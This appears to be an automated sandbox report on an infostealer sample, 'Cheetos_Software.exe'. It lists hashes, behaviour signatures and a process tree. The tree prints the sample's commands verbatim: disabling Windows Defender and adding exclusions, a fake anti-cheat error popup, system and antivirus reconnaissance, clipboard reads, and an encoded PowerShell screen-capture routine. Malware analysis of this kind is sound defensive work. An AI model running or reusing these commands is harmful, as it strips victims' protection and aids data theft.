SHA1 e1d11f16c400683292e34e6a480a0a33f322ba1a
SHA256 e2cadcf9b2e5a35d719796a2763a459e21f366f6fac341688f8497a05f2d1f5f
SHA512 1a92b02bb6dd918dc580ac368385bdd27a7be7c3b982843c02faf6f59d900c122549ac27a1762b0622101b091684db872006998e732eb27c97b48f83b51ec55b

C:\Users\Admin\AppData\Local\Temp\    ​     \System\MAC Addresses.txt

MD5 6dad4876cc765c72b511349b4e25aaa3
SHA1 e4b9cf54ff3424526b4dd12b4b5019c12f2a9cf7
SHA256 7f88dfee0d4f9abbc1509f1648cad4ce95b3301aff91b1c13fa523acf2e8d7f2
SHA512 c171a678168dbebcae9a2eefe689e6353f81bf266476bae24322af2772c6ba732b833842c896abaf6e097df9643228147c9998c98693e05ba9331fdf7c0c226c

memory/5100-289-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/5100-291-0x000002341F0A0000-0x000002341F0B0000-memory.dmp

memory/5100-290-0x000002341F0A0000-0x000002341F0B0000-memory.dmp

memory/5100-293-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/3096-232-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/2000-294-0x00007FFD30D50000-0x00007FFD3133E000-memory.dmp

memory/2000-295-0x00007FFD43B50000-0x00007FFD43B74000-memory.dmp

memory/2000-305-0x00007FFD303E0000-0x00007FFD30902000-memory.dmp

memory/2000-308-0x00007FFD2FD00000-0x00007FFD2FE1C000-memory.dmp

memory/2000-307-0x00007FFD40180000-0x00007FFD4018D000-memory.dmp

memory/2000-306-0x00007FFD3CD20000-0x00007FFD3CD34000-memory.dmp

memory/2000-304-0x00007FFD30910000-0x00007FFD309DD000-memory.dmp

memory/2000-303-0x00007FFD3FF50000-0x00007FFD3FF83000-memory.dmp

memory/2000-302-0x00007FFD404E0000-0x00007FFD404ED000-memory.dmp

memory/2000-301-0x00007FFD3FF90000-0x00007FFD3FFA9000-memory.dmp

memory/2000-300-0x00007FFD309E0000-0x00007FFD30B56000-memory.dmp

memory/2000-299-0x00007FFD3FFD0000-0x00007FFD3FFF3000-memory.dmp

memory/2000-298-0x00007FFD40190000-0x00007FFD401A9000-memory.dmp

memory/2000-297-0x00007FFD401B0000-0x00007FFD401DD000-memory.dmp

memory/2000-296-0x00007FFD49860000-0x00007FFD4986F000-memory.dmp

memory/3916-311-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-321-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-320-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-319-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-318-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-317-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-316-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-315-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-310-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-309-0x00000270E5830000-0x00000270E5831000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-07 20:08

Reported

2024-04-07 20:11

Platform

win11-20240221-en

Max time kernel

94s

Max time network

98s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4092 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe
PID 4092 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe
PID 3164 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 4496 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4496 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3648 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3648 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 900 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 900 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3164 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1984 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3164 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1384 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3164 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 4384 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4384 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1100 wrote to memory of 1416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1100 wrote to memory of 1416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4672 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2920 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2920 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3264 wrote to memory of 964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3264 wrote to memory of 964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1432 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1432 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2652 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3164 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 924 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 924 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3164 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2988 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌​‏ .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌​‏ .scr'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAH
